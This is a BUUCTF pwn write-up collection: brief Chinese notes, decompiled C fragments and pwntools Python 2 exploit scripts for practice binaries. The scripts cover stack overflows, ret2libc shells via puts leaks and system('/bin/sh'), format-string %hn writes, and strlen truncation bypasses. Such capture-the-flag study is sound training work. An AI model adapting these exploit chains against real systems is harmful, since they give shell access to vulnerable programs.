buuctf wp
try_your_nc
# try_your_nc: warm-up challenge.  No payload at all -- connect to the service
# and hand the socket to the user (pwntools interactive mode).
from pwn import *
from sys import *  # NOTE(review): unused; the star-import also shadows builtins such as `exit`
debug=1
# NOTE(review): the flag is inverted relative to the later scripts, which use
# debug=1 for the local process and debug=0 for the remote service.
if debug:
    p=remote("node3.buuoj.cn",26062)
else:
    p=process("xxx")  # placeholder binary path, never filled in
p.interactive()
pwn1_sctf_2016
C++ 写的,害,输入I, 会转换为you,所以有溢出啊,还有后面函数
# pwn1_sctf_2016: per the writeup note, the program expands every 'I' of the
# input to "you", so 20 'I's become 60 bytes and overrun the destination buffer;
# the overwritten return address is pointed at `door`.
from pwn import *
from sys import *  # NOTE(review): unused; the star-import also shadows builtins such as `exit`
debug=1
context.log_level='debug'
context.arch='amd64'  # NOTE(review): the payload uses p32(), i.e. a 32-bit target; the arch value is presumably a leftover
if debug:
    p=process("./pwn1_sctf_2016")
else:
    host = "node3.buuoj.cn"
    port = 28912
    p=remote(host, port)
door = 0x8048f0d  # fixed address returned into -- only valid for a non-PIE binary
# 20 * "I" -> 60 bytes after expansion, 4 more bytes (presumably the saved ebp
# slot), then the new return address.
pay =20*"I"+"aaaa"+p32(door)
# NOTE(review): sits after the if/else, so it runs unconditionally; attaching a
# debugger cannot work on a remote tube and presumably belongs under `if debug:`.
gdb.attach(p,"b *0x80491DE")
p.sendline(pay)
p.interactive()
ciscn_2019_n_1 浮点数查看
# ciscn_2019_n_1: the section title says this is about inspecting a float.
# The payload is 4*8 + 3*4 = 44 zero bytes followed by the 8-byte value
# 0x41348000, whose low dword is the IEEE-754 single-precision encoding of
# 11.28125 -- presumably the value a float comparison in the target expects.
from pwn import *
from sys import *  # NOTE(review): unused; the star-import also shadows builtins such as `exit`
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
    p=process("./ciscn_2019_n_1")
else:
    host = "node3.buuoj.cn"
    port =29648
    p=remote(host, port)
# 44 bytes of filler, then the float bit pattern (as a 64-bit little-endian value).
pay = p64(0)*4+p32(0)*3+p64(0x41348000)
#gdb.attach(p,"b *0x80491DE")
p.sendline(pay)
p.interactive()
ciscn_2019_c_1
泄露 打system 需要进行一个栈对齐,不能打onegadget
# ciscn_2019_c_1: two-round ret2libc.  Round 1 overflows the input buffer and
# calls puts(puts@got) to leak a libc address, then returns to main; round 2
# overflows again and calls system("/bin/sh") relative to the computed base.
# Written for Python 2 (str payloads, `print` statement).
from pwn import *
from sys import *  # NOTE(review): unused; the star-import also shadows builtins such as `exit`
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
    p=process("./ciscn_2019_c_1")
else:
    host = "node3.buuoj.cn"
    port =25934
    p=remote(host, port)
# Fixed binary addresses: a `pop rdi; ret` gadget (from its name), puts' GOT and
# PLT entries, and main.  Hard-coding them only works for a non-PIE binary.
pop_rdi_t=0x400c83
put_got = 0x602020
put_plt = 0x4006E0
main= 0x400B28
# 0x58 filler bytes reach the saved return address (presumably buffer + saved
# rbp), then: rdi <- puts@got ; puts@plt ; return to main for the second round.
pay = "a"*0x58 + p64(pop_rdi_t)+p64(put_got)+p64(put_plt)+p64(main)
#gdb.attach(p)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
# The leaked puts address is the 6 bytes ending at the first 0x7f byte received.
# NOTE(review): assumes the pointer's top byte is 0x7f and that no earlier output
# byte is 0x7f -- fragile, though typical for x86-64 user-space libc mappings.
put_add = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
# Offsets below are for the remote's libc; the commented values are other builds.
base = put_add-0x0809c0
one = base + 0x4526a#0xf1147#0x45216#,0x4526a#0xf02a4#  one_gadget candidates; unused in the final chain (the note above says it cannot be used here)
print "put:"+hex(put_add)
print "base:"+hex(base)
str_bin = base+0x1b3e9a#0x18cd57  address of a "/bin/sh" string inside libc
system = base + 0x04f440#0x045390
ret = 0x4006b9 # ubuntu 18 needs a stack adjustment here, because the stack must be aligned when calling system
# The extra `ret` keeps rsp 16-byte aligned at the system() call.
pay = "a"*0x58 +p64(ret)+ p64(pop_rdi_t)+p64(str_bin)+p64(system)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
# NOTE(review): the whole chain depends on a non-PIE binary without a stack
# canary; either mitigation breaks it as written.
p.interactive()
babyrop
这个题的关键在于绕过strncmp,strlen函数遇到‘\0’截断,但read 函数遇到‘\n’才截断,然后read函数有一个溢出可以把v5覆盖掉,v5 返回到main函数 ,可以控制另一个函数溢出。
// Decompiled (IDA-style) listing of babyrop's first stage.
// NOTE(review): the return type was garbled in the paste ("nt"), presumably
// "int"; the function's closing brace is also missing from the listing.
nt __cdecl sub_804871F(int a1)
{
size_t v1; // eax
char s; // [esp+Ch] [ebp-4Ch]
char buf[7]; // [esp+2Ch] [ebp-2Ch]   -- buf + 7 is ebp-25h, i.e. v5
unsigned __int8 v5; // [esp+33h] [ebp-25h]
ssize_t v6; // [esp+4Ch] [ebp-Ch]
memset(&s, 0, 0x20u);
memset(buf, 0, 0x20u);
sprintf(&s, "%ld", a1);
v6 = read(0, buf, 0x20u); // reads up to 0x20 bytes into a 7-byte buffer: overflows into v5
// NOTE(review): no check on v6 -- a return of 0 or -1 indexes before the buffer.
buf[v6 - 1] = 0; // drops the last byte read (the trailing newline for line-based input)
v1 = strlen(buf); // a leading NUL byte makes strlen(buf) == 0 ...
if ( strncmp(buf, &s, v1) ) // ... and strncmp with length 0 compares nothing, so the check passes
exit(0);
write(1, "Correct\n", 8u);
return v5; // the overwritten byte is handed to the next function as its argument
// Decompiled listing of babyrop's second stage.  (Author's note on the
// signature line: this a1 is the v5 returned by the previous function.)
ssize_t __cdecl sub_80487D0(char a1) 这个a1 就是返回的V5了
{
ssize_t result; // eax
char buf; // [esp+11h] [ebp-E7h]   -- 0xe7 bytes below the saved ebp
// NOTE(review): the character literal was lost in the paste; presumably '\0'.
if ( a1 == '' )
result = read(0, &buf, 0xC8u);
else
result = read(0, &buf, a1); // overflow: the length comes from the attacker-controlled byte, with no bound on buf's size
return result;
}
比较操蛋的是远程的 lib库,一定要远程去查。
# babyrop: stage 1 passes sub_804871F's strncmp check with a leading NUL byte
# and overwrites v5 with 0xff; stage 2 then overflows sub_80487D0's buffer twice
# (leak puts, return to main, then call system).  Written for Python 2.
from pwn import *
from sys import *  # NOTE(review): unused; the star-import also shadows builtins such as `exit`
debug=0
context.log_level='debug'
context.arch='amd64'  # NOTE(review): the payloads use p32()/u32(); the arch value is presumably a leftover
if debug:
    p=process("./babyrop")
else:
    host = "node3.buuoj.cn"
    port =27828
    p=remote(host, port)
libc = ELF('./libc6_2.23-0ubuntu10_i386.so') #not this library, don't mess with it
# NOTE(review): `libc` is never used -- every offset below is hard-coded for the
# remote's libc, and the commented-out `libc.*` lookups are the local guesses.
#gdb.attach(p)
put_plt = 0x8048548
put_got = 0x8049FD4
main = 0x8048825
# Byte 0 is NUL (strlen -> 0, strncmp compares nothing); byte 7 (= v5) becomes 0xff.
pay = "\x00"+"\xff"*8
p.sendline(pay)
p.recvuntil("Correct\n")
# 0xe7 bytes reach the saved ebp, 4 bytes overwrite it, then (32-bit convention)
# return into puts@plt with main as puts' return address and puts@got as its argument.
pay = 0xe7 *"a"+ "aaaa"+p32(put_plt)+p32(main)+p32(put_got)
p.sendline(pay)
# Last 4 bytes up to the first 0xf7 seen = leaked puts address.
# NOTE(review): assumes the pointer's top byte is 0xf7 (typical 32-bit libc mapping) -- fragile.
put_add =u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
base = put_add -0x05f140# libc.symbols["puts"]#0x05fca0
print "put:"+hex(put_add)
print "base:"+hex(base)
# Second pass through sub_804871F, same trick as before.
pay = "\x00"+"\xff"*8
p.sendline(pay)
str_bin = base +0x15902b# libc.search("/bin/sh").next()#0x15ba0b
system = base + 0x03a940#libc.symbols["system"]#0x03ada0
one = base+0x5fbc6#0x5fbc5#0x3ac69#0x3ac62#0x3ac5e #0x3ac5c#  one_gadget candidates; unused in the final payload
# Return into system with a dummy return address and "/bin/sh" as the argument.
pay = 0xe7 *"a"+ "aaaa"+p32(system)+p32(0xbeeefff)+p32(str_bin)
#pay = 0xe7 *"a"+ "aaaa"+p32(one)
p.sendline(pay)
#input()
p.interactive()
ciscn_2019_en_2
和ciscn_2019_c_1 一模一样
# ciscn_2019_en_2: same two-round ret2libc chain as the ciscn_2019_c_1 script
# (the writeup says the challenges are identical); only the port differs.
# Written for Python 2 (str payloads, `print` statement).
from pwn import *
from sys import *  # NOTE(review): unused; the star-import also shadows builtins such as `exit`
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
    p=process("./ciscn_2019_en_2")
else:
    host = "node3.buuoj.cn"
    port =27611
    p=remote(host, port)
# Fixed, non-PIE binary addresses: `pop rdi; ret` gadget, puts@got, puts@plt, main.
pop_rdi_t=0x400c83
put_got = 0x602020
put_plt = 0x4006E0
main= 0x400B28
# Round 1: 0x58 filler bytes, then puts(puts@got) and return to main.
pay = "a"*0x58 + p64(pop_rdi_t)+p64(put_got)+p64(put_plt)+p64(main)
#gdb.attach(p)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
# NOTE(review): assumes the leaked pointer's top byte is 0x7f and that no earlier
# output byte is 0x7f -- fragile.
put_add = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
base = put_add-0x0809c0
one = base + 0x10a38c#0x4f322#0x4f2c5# 0x4526a#0xf1147#0x45216#,0x4526a#0xf02a4#  one_gadget candidates; only used by the commented-out payload
print "put:"+hex(put_add)
print "base:"+hex(base)
str_bin = base+0x1b3e9a#0x18cd57  "/bin/sh" string inside libc
system = base + 0x04f440#0x045390
ret = 0x4006b9 # ubuntu 18 stack adjustment (keeps rsp 16-byte aligned for the system() call)
# Round 2: ret ; pop rdi <- "/bin/sh" ; system.
pay = "a"*0x58 +p64(ret)+ p64(pop_rdi_t)+p64(str_bin)+p64(system)
#pay = "a"*0x58 +p64(ret)+ p64(one)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
# NOTE(review): as with ciscn_2019_c_1, a PIE build or a stack canary would break this chain.
p.interactive()
get_started_3dsctf_2016
溢出,后面函数,需要注意的是参数要传对,才能执行后门函数
// Decompiled backdoor of get_started_3dsctf_2016: prints flag.txt, but only when
// both arguments carry the expected magic values.
void __cdecl get_flag(int a1, int a2)
{
int v2; // eax
int v3; // esi
unsigned __int8 v4; // al
int v5; // ecx
unsigned __int8 v6; // al
if ( a1 == 0x308CD64F && a2 == 0x195719D1 ) // both argument values must match, otherwise nothing happens
{
v2 = fopen("flag.txt", "rt"); // NOTE(review): the handle is never checked for NULL before use
v3 = v2;
v4 = getc(v2);
// getc() returns EOF (-1), which truncates to 0xFF in an unsigned __int8 --
// hence the 0xFF / 255 tests below; a genuine 0xFF byte in the file would stop the loop too.
if ( v4 != '\xFF' )
{
v5 = (char)v4;
do
{
putchar(v5); // echo one byte at a time
v6 = getc(v3);
v5 = (char)v6;
}
while ( v6 != 255 );
}
fclose(v3);
}
}
exp
#!/usr/bin/env python2
# execve generated by ROPgadget
# NOTE(review): the header above is a leftover ROPgadget template -- there is no
# execve chain here; `pack` is likewise imported but unused.
# get_started_3dsctf_2016: overflow the buffer and call get_flag with the two
# magic arguments it checks (0x308CD64F and 0x195719D1 in the decompiled code).
from pwn import *
from sys import *  # NOTE(review): unused; the star-import also shadows builtins such as `exit`
from struct import pack
debug=0
context.log_level='debug'
context.arch='i386'
if debug:
    o=process("./get")
    gdb.attach(o,"b *0x8048A3B")
else:
    host = "node3.buuoj.cn"
    port =26456
    o=remote(host, port)
ret = 0x8048A40
flag = 0x80489A0  # get_flag
# 56 filler bytes up to the return address, then `ret`, get_flag, the address
# get_flag will return to (0x804e6a0 -- presumably an exit-style function),
# and its two arguments a1 and a2.
p = 'a'* 56+p32(ret)+p32(flag)+p32(0x804e6a0)+p32(0x308CD64F)+p32(0x195719D1)
o.sendline(p)
o.interactive()
PWN5
绕过if 条件,格式化字符串可写,修改unk_804C044内容即可
// Decompiled fragment of PWN5 (the enclosing function is not shown).
srand(v1);
fd = open("/dev/urandom", 0);
read(fd, &unk_804C044, 4u); // 4 random bytes become the expected password (global at 0x804C044)
// NOTE(review): fd is neither checked nor closed, and a short read leaves the secret partly uninitialised.
printf("your name:");
read(0, &buf, 0x63u);
printf("Hello,");
printf(&buf); // format-string bug: the user's input is the format string, so %n can write memory -- the fix is printf("%s", buf)
printf("your passwd:");
read(0, &nptr, 0xFu);
if ( atoi(&nptr) == unk_804C044 ) // the random value is compared, but it has been overwritten by then
{
puts("ok!!");
system("/bin/sh");
}
这道题可以收获的是32位格式化写的时候,payload的构造
p32(add1)+p32(add2)+p32(add3)+"%10$hn%11$hn%12$hn" #hn是双字节写
如果是特定字符写的话,就要巧妙的构造了,比如
p32(add)+"%"+str(xxxxx)+"c%xx$hn"
p32(0x804C044)+p32(0x804C044+2)+"%10$hn" +"%11$hn" #hn是双字节写
#!/usr/bin/env python2
# execve generated by ROPgadget
# NOTE(review): the header above is a leftover template -- this is a format-string
# write, not a ROPgadget chain; `pack` is imported but unused.
# PWN5: the name prompt is printed with printf(&buf), so the input doubles as a
# format string.  Two %hn writes set the 4-byte global at 0x804C044 to a known
# value, which is then supplied as the password.
from pwn import *
from sys import *  # NOTE(review): unused; the star-import also shadows builtins such as `exit`
from struct import pack
debug=0
context.log_level='debug'
context.arch='i386'
if debug:
    o=process("./pwn5")
    gdb.attach(o,"b *0x080492A6")
else:
    host = "node3.buuoj.cn"
    port =28330
    o=remote(host, port)
# The two addresses (8 bytes) are printed first, so each %hn stores 8: the low
# halfword via positional arg 10 and the high halfword via arg 11, giving
# 0x00080008 == 524296.  The stack offsets 10/11 are an assumption about where
# the start of buf lies relative to printf's varargs -- TODO confirm.
pay = p32(0x804C044)+p32(0x804C044+2)+"%10$hn" +"%11$hn" #hn writes two bytes
o.sendlineafter("your name:",pay)
pa = p32(0x80008)  # NOTE(review): unused; the same value is sent below as decimal text
o.sendlineafter("your passwd:","524296")
o.interactive()
r2t3
这 tm 有后门函数 我没看到。。。wc
整数溢出 其实很简单,但是我竟然搞了很久。。wotm 我太菜了
# r2t3: the name length check only keeps the low byte of strlen() (see the
# disassembly note after this script), so a 261-byte name reads as length 5.
# The long name then overflows the stack; 0x804858B (presumably the backdoor the
# writeup mentions) is repeated so that the return-address slot lands on it.
from pwn import *
from sys import *  # NOTE(review): unused; the star-import also shadows builtins such as `exit`
from struct import pack  # NOTE(review): unused
debug=0
context.log_level='debug'
context.arch='i386'
libc = ELF('./libc-2.29.so')  # NOTE(review): loaded but never used
if debug:
    o=process("./r2t3")
    gdb.attach(o,"b *0x8048615")
else:
    host = "node3.buuoj.cn"
    port =27787
    o=remote(host, port)
# 17 + 4 + 60*4 = 261 bytes; 261 & 0xff == 5.
pay = 'a'*17+'aaaa'+p32(0x804858B)+p32(0x804858B)+p32(0x804858B)*58
o.sendlineafter("your name:\n",pay)
o.interactive()
绕过strlen 检查 ,strlen返回值存在eax 但用的只有al
.text:080485E1 call _strlen                ; strlen() returns the full length in eax
.text:080485E6 add esp, 10h
.text:080485E9 mov [ebp+var_9], al         ; only the low byte is stored, so lengths >= 256 wrap modulo 256 and the check that follows sees a small value
ciscn_2019_n_8
// Decompiled fragment of ciscn_2019_n_8 (enclosing function and closing braces not shown).
__isoc99_scanf("%s", var, v4, v5); // unbounded "%s" read into var: no length limit at all (a width such as "%Ns" would bound it)
if ( *(_QWORD *)&var[13] ) // 8 bytes starting at element 13 of var
{
if ( *(_QWORD *)&var[13] == 0x11LL ) // the input must place exactly 0x11 there
system("/bin/sh");
#!/usr/bin/env python2
# execve generated by ROPgadget
# NOTE(review): leftover template header -- no ROPgadget chain here; `pack` is unused.
# ciscn_2019_n_8: scanf("%s") fills `var` without a bound; the decompiled check
# wants the 8 bytes at &var[13] to equal 0x11.
from pwn import *
from sys import *  # NOTE(review): unused; the star-import also shadows builtins such as `exit`
from struct import pack
debug=0
context.log_level='debug'
context.arch='i386'
if debug:
    o=process("./ciscn_2019_n_8")
    gdb.attach(o)
else:
    host = "node3.buuoj.cn"
    port =26224
    o=remote(host, port)
# 14 dwords of 0x11 = 56 bytes.  Assuming var has 4-byte elements (its declaration
# is not in the snippet), element 13 starts at byte 52 and gets 0x11; the upper
# half of the QWORD compare then relies on the bytes after the input being zero
# (scanf's terminating NUL and whatever follows) -- TODO confirm.
pay = p32(0x11)*14
o.sendlineafter("What's your name?",pay)
o.interactive()